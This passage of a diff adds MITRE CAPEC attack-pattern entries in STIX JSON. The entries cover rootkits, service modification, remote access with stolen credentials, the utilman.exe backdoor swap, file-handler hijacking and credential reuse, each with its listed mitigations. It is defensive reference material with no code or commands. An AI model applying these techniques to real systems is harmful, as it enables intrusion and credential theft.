"attack-pattern--aef8e9e0-4714-4890-9470-06276c61abfd", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "When an operating system starts, it also starts programs called services or daemons. Modifying existing services may break existing services or may enable services that are disabled/not commonly used.", + "external_references": [ + { + "external_id": "CAPEC-551", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/551.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "description": "Create or Modify System Process", + "external_id": "T1543", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1543" + } + ], + "id": "attack-pattern--13e147c3-7baa-4ec4-aafd-9135d46545cc", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Modify Existing Service", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Limit privileges of user accounts so service changes can only be performed by authorized administrators. 
Also monitor any service changes that may occur inadvertently.", + "id": "course-of-action--f3d72fe1-750b-47c0-9526-4728852a4e5b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-551-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f0245e1a-1d11-480f-a078-397f1133e3d3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f3d72fe1-750b-47c0-9526-4728852a4e5b", + "target_ref": "attack-pattern--13e147c3-7baa-4ec4-aafd-9135d46545cc", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in authentication to install malware that alters the functionality and information provide by targeted operating system API calls. 
Often referred to as rootkits, it is often used to hide the presence of programs, files, network connections, services, drivers, and other system components.", + "external_references": [ + { + "external_id": "CAPEC-552", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/552.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "description": "Rootkit", + "external_id": "T1014", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1014" + }, + { + "description": "Pre-OS Boot:Bootkit", + "external_id": "T1542.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1542/003" + }, + { + "description": "Boot or Logon Autostart Execution:Kernel Modules and Extensions", + "external_id": "T1547.006", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1547/006" + } + ], + "id": "attack-pattern--79037ec7-444c-42cb-a64b-fb4b4f6bd156", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Install Rootkit ", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "A rootkit may take the form of a hypervisor. A hypervisor is a software layer that sits between the operating system and the processor. It presents a virtual running environment to the operating system. An example of a common hypervisor is Xen. Because a hypervisor operates at a level below the operating system it can hide its existence from the operating system.", + "Similar to a rootkit, a bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). 
Adversaries may use bootkits to persist on systems at a layer below the operating system, which may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly." + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Prevent adversary access to privileged accounts necessary to install rootkits.", + "id": "course-of-action--7b0746b7-4370-4dbd-9a32-96187b4ac73f", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-552-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4d2cd3db-aad4-4f8f-b45c-6841ffaeef34", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7b0746b7-4370-4dbd-9a32-96187b4ac73f", + "target_ref": "attack-pattern--79037ec7-444c-42cb-a64b-fb4b4f6bd156", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-12-07T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary attacks a system by bypassing some or all functionality intended to protect it. 
Often, a system user will think that protection is in place, but the functionality behind those protections has been disabled by the adversary.", + "external_references": [ + { + "external_id": "CAPEC-554", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/554.html" + }, + { + "external_id": "CWE-424", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/424.html" + }, + { + "external_id": "CWE-1299", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1299.html" + } + ], + "id": "attack-pattern--ec382da0-af49-489b-bca1-a555d48b7ce3", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Functionality Bypass", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--177d22be-7b76-4726-8085-61756f95c0ce", + "attack-pattern--ed57f38c-2f0c-47ad-a6e2-16932fde978f", + "attack-pattern--2b6e94c6-26d0-489c-989c-9f4307348c42" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This pattern of attack involves an adversary that uses stolen credentials to leverage remote services such as RDP, telnet, SSH, and VNC to log into a system. 
Once access is gained, any number of malicious activities could be performed.", + "external_references": [ + { + "external_id": "CAPEC-555", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/555.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "external_id": "CWE-294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-521", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/521.html" + }, + { + "description": "Remote Services", + "external_id": "T1021", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1021" + }, + { + "description": "Email Collection:Remote Email Collection", + "external_id": "T1114.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1114/002" + }, + { + "description": "External Remote Services", + "external_id": "T1133", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1133" + } + ], + "id": "attack-pattern--06e8782a-87af-4863-b6b1-99e09edda3be", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Remote Services with Stolen Credentials", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b" + ], + 
"x_capec_child_of_refs": [ + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). There are other implementations and third-party tools that provide graphical access Remote Services similar to RDS. Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials.", + "Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). It may be called with the winrm command or by any number of programs such as PowerShell." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Disable RDP, telnet, SSH and enable firewall rules to block such traffic. Limit users and accounts that have remote interactive login access. Remove the Local Administrators group from the list of groups allowed to login through RDP. Limit remote user permissions. 
Use remote desktop gateways and multifactor authentication for remote logins.", + "id": "course-of-action--3c080d71-9309-4804-877c-86e391e4b059", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-555-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--02cc8969-deb0-4e79-ba08-2e68197ab5f6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3c080d71-9309-4804-877c-86e391e4b059", + "target_ref": "attack-pattern--06e8782a-87af-4863-b6b1-99e09edda3be", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "When a file is opened, its file handler is checked to determine which program opens the file. File handlers are configuration properties of many operating systems. 
Applications can modify the file handler for a given file extension to call an arbitrary program when a file with the given extension is opened.", + "external_references": [ + { + "external_id": "CAPEC-556", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/556.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "description": "Event Triggered Execution:Change Default File Association", + "external_id": "T1546.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1546/001" + } + ], + "id": "attack-pattern--ccb9c607-8bfe-4141-8843-356453179da7", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Replace File Extension Handlers", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Inspect registry for changes. 
Limit privileges of user accounts so changes to default file handlers can only be performed by authorized administrators.", + "id": "course-of-action--4709dd63-ad1f-4755-b03a-b1441d4a3f50", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-556-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--96425e94-0d20-4e81-a5f2-950f705d5102", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4709dd63-ad1f-4755-b03a-b1441d4a3f50", + "target_ref": "attack-pattern--ccb9c607-8bfe-4141-8843-356453179da7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This CAPEC has been deprecated because it is not directly related to a weakness, social engineering, supply chains, or a physical-based attack.", + "external_references": [ + { + "external_id": "CAPEC-557", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/557.html" + } + ], + "id": "attack-pattern--ccf63cb4-ae14-4c51-a379-9dd09be8f078", + "modified": "2020-07-30T00:00:00.000Z", + "name": "DEPRECATED: Schedule Software To Run", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits weaknesses in privilege management or access control to replace a 
trusted executable with a malicious version and enable the execution of malware when that trusted executable is called.", + "external_references": [ + { + "external_id": "CAPEC-558", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/558.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "description": "Server Software Component: Terminal Services DLL", + "external_id": "T1505.005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1505/005" + }, + { + "description": "Event Triggered Execution: Accessibility Features", + "external_id": "T1546.008", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1546/008" + } + ], + "id": "attack-pattern--d9069913-2a5f-4ad5-878e-73181f0b1067", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Replace Trusted Executable", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Specific versions of Windows contain accessibility features that may be launched with a key combination before a user has logged in (for example when they are on the Windows Logon screen). On Windows XP and Windows Server 2003/R2, the program (e.g. \"C:\\Windows\\System32\\utilman.exe\") may be replaced with cmd.exe (or another program that provides backdoor access). Then pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over RDP will cause the replaced file to be executed with SYSTEM privileges." 
+ ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack pattern, the adversary sends disruptive signals at a target satellite using a rogue uplink station to disrupt the intended transmission. Those within the satellite's footprint are prevented from reaching the satellite's targeted or neighboring channels. The satellite's footprint size depends upon its position in the sky; higher orbital satellites cover multiple continents.", + "external_references": [ + { + "external_id": "CAPEC-559", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/559.html" + }, + { + "description": "Small Media, Satellite Jamming in Iran: A War over Airwaves, 2012--11", + "external_id": "REF-462", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--7a6e0e5c-f18e-4612-aaa6-68bdeb378b31", + "modified": "2017-01-12T00:00:00.000Z", + "name": "Orbital Jamming", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--7534fc4c-f683-4918-8f62-005e0402d18a" + ], + "x_capec_consequences": { + "Availability": [ + "Other (A successful attack will deny the availability of the satellite communications for authorized users.)" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "This attack requires the knowledge of the satellite's coordinates for targeting." + ], + "x_capec_resources_required": [ + "A satellite uplink station." 
+ ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of CAPEC-207 : Removing Important Client Functionality. Please refer to this other pattern going forward.", + "external_references": [ + { + "external_id": "CAPEC-56", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/56.html" + } + ], + "id": "attack-pattern--86daf34c-5e2b-49d7-b579-cfde98c462ac", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: Removing/short-circuiting 'guard logic'", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary guesses or obtains (i.e. steals or purchases) legitimate credentials (e.g. 
userID/password) to achieve authentication and to perform authorized actions under the guise of an authenticated user or service.\n ", + "external_references": [ + { + "external_id": "CAPEC-560", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/560.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-307", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/307.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-654", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/654.html" + }, + { + "external_id": "CWE-1273", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1273.html" + }, + { + "description": "Valid Accounts", + "external_id": "T1078", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1078" + }, + { + "description": "Attractive Accounts for Credential Theft, 2017--05---31, Microsoft Corporation", + "external_id": "REF-570", + "source_name": "reference_from_CAPEC", + "url": "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/attractive-accounts-for-credential-theft?redirectedfrom=MSDN" + }, + { + "description": "Feike Hacquebord, Two Years of Pawn Storm: Examining an Increasingly Relevant Threat, 2017--04---25, Trend Micro", + "external_id": "REF-571", + "source_name": "reference_from_CAPEC", + "url": 
"https://documents.trendmicro.com/assets/wp/wp-two-years-of-pawn-storm.pdf" + }, + { + "description": "Corporate IoT – a path to intrusion, 2019--10---05, Microsoft Security Response Center (MSRC)", + "external_id": "REF-572", + "source_name": "reference_from_CAPEC", + "url": "https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion" + }, + { + "description": "Brendan McKeague, Van Ta, Ben Fedore, Geoff Ackerman, Alex Pennino, Andrew Thompson, Douglas Bienstock, Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware, 2019--04---05, Microsoft Security Response Center (MSRC)", + "external_id": "REF-573", + "source_name": "reference_from_CAPEC", + "url": "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html" + } + ], + "id": "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Use of Known Domain Credentials", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_can_follow_refs": [ + "attack-pattern--a9dc4914-409a-4f71-80df-c5cc3923d112", + "attack-pattern--c2a87533-3c81-40b3-b529-9560c644f70d", + "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427", + "attack-pattern--addd93c9-9278-4185-b402-e505d632c815", + "attack-pattern--a4986dd8-cb9c-45cb-bb53-b7549f2b8d62", + "attack-pattern--a390cb72-b4de-4750-ae05-be556c89f4be", + "attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d", + "attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f", + "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Read Data" + ], + "Confidentiality": [ + "Gain Privileges", + 
"Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "Throughout 2015 and 2016, APT28 — also known as Pawn Storm, Sednit, Fancy Bear, Sofacy, and STRONTIUM — leveraged stolen credentials to infiltrate the Democratic National Committee (DNC), the United States Army, the World Anti-Doping Agency (WADA), the Court of Arbitration for Sport (TAS-CAS), and more. In most cases, the legitimate credentials were obtained via calculated spearphishing, tabnabbing, and DNS attacks targeted at corporate webmail systems. APT28 also executed several watering hole attacks, in addition to exploiting several zero-day vulnerabilities within Flash and Windows. The stolen credentials were then utilized to maintain authenticated access, laterally move within the local network, and exfiltrate sensitive information including DNC emails and personal medical records of numerous athletes. [REF-571]", + "In early 2019, FIN6 exploited stolen credentials from an organization within the engineering industry to laterally move within an environment via the Windows’ Remote Desktop Protocol (RDP). Multiple servers were subsequently infected with malware to create malware distribution servers, which were used to distribute the LockerGoga ransomware. [REF-573]" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Acquire known credentials: The adversary must obtain known credentials in order to access the target system, application, or service.

  2. Techniques
    An adversary purchases breached username/password combinations or leaked hashed passwords from the dark web.
    An adversary leverages a key logger or phishing attack to steal user credentials as they are provided.
    An adversary conducts a sniffing attack to steal credentials as they are transmitted.
    An adversary gains access to a database and exfiltrates password hashes.
    An adversary examines outward-facing configuration and properties files to discover hardcoded credentials.
  3. Determine target's password policy: Determine the password policies of the target system/application to determine if the known credentials fit within the specified criteria.

  4. Techniques
    Determine minimum and maximum allowed password lengths.
    Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc., or whether they are allowed to contain words from the dictionary).
    Determine account lockout policy (a strict account lockout policy will prevent brute force attacks if multiple passwords are known for a single user account).

Experiment

  1. Attempt authentication: Try each credential until the target grants access.

  2. Techniques
    Manually or automatically enter each credential through the target's interface.

Exploit

  1. Impersonate: An adversary can use successful experiments or authentications to impersonate an authorized user or system, or to laterally move within a system or application

  2. Spoofing: Malicious data can be injected into the target system or into a victim user's system by an adversary. The adversary can also pose as a legitimate user to perform social engineering attacks.

  3. Data Exfiltration: The adversary can obtain sensitive data contained within the system or application.

", + "x_capec_extended_description": "\n Attacks leveraging trusted credentials typically result in the adversary laterally moving within the local network, since users are often allowed to login to systems/applications within the network using the same password. This further allows the adversary to obtain sensitive data, download/install malware on the system, pose as a legitimate user for social engineering purposes, and more.\n Attacks on known passwords generally rely on the primary fact that users often reuse the same username/password combination for a variety of systems, applications, and services, coupled with poor password policies on the target system or application. Adversaries can also utilize known passwords to target Single Sign On (SSO) or cloud-based applications and services, which often don't verify the authenticity of the user's input. Known credentials are usually obtained by an adversary via a system/application breach and/or by purchasing dumps of credentials on the dark web. These credentials may be further gleaned via exposed configuration and properties files that contain system passwords, database connection strings, and other sensitive data.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--06e8782a-87af-4863-b6b1-99e09edda3be", + "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c", + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_prerequisites": [ + "The system/application uses one factor password based authentication, SSO, and/or cloud-based authentication.", + "The system/application does not have a sound password policy that is being enforced.", + "The system/application does not implement an effective password throttling mechanism.", + "The adversary possesses a list of known user accounts and corresponding passwords that may exist on the target." 
+ ], + "x_capec_resources_required": [ + "A list of known credentials.", + "A custom script that leverages the credential list to launch an attack." + ], + "x_capec_skills_required": { + "Low": "Once an adversary obtains a known credential, leveraging it is trivial." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage multi-factor authentication for all authentication services and prior to granting an entity access to the domain network.", + "id": "course-of-action--b8f274c3-95ed-4968-afdc-6a8a87a6fb19", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-560-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e3e578d6-8b57-4c74-a939-800e0cf7a45b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b8f274c3-95ed-4968-afdc-6a8a87a6fb19", + "target_ref": "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6395a05b-7097-429d-878c-c8c1f5d4beb4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--93ed0e66-1693-44b2-b416-bee8db1ad4c2", + "target_ref": "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "type": "relationship", + 
"x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure users are not reusing username/password combinations for multiple systems, applications, or services.", + "id": "course-of-action--f17a2576-00f1-49a8-b554-5ec205ca54a2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-560-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--00382075-fd38-4145-ac07-88fa46ab5e82", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f17a2576-00f1-49a8-b554-5ec205ca54a2", + "target_ref": "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not reuse local administrator account credentials across systems.", + "id": "course-of-action--7c813ade-2f68-46ad-b0ff-b3aa1d6f16d0", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-560-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + 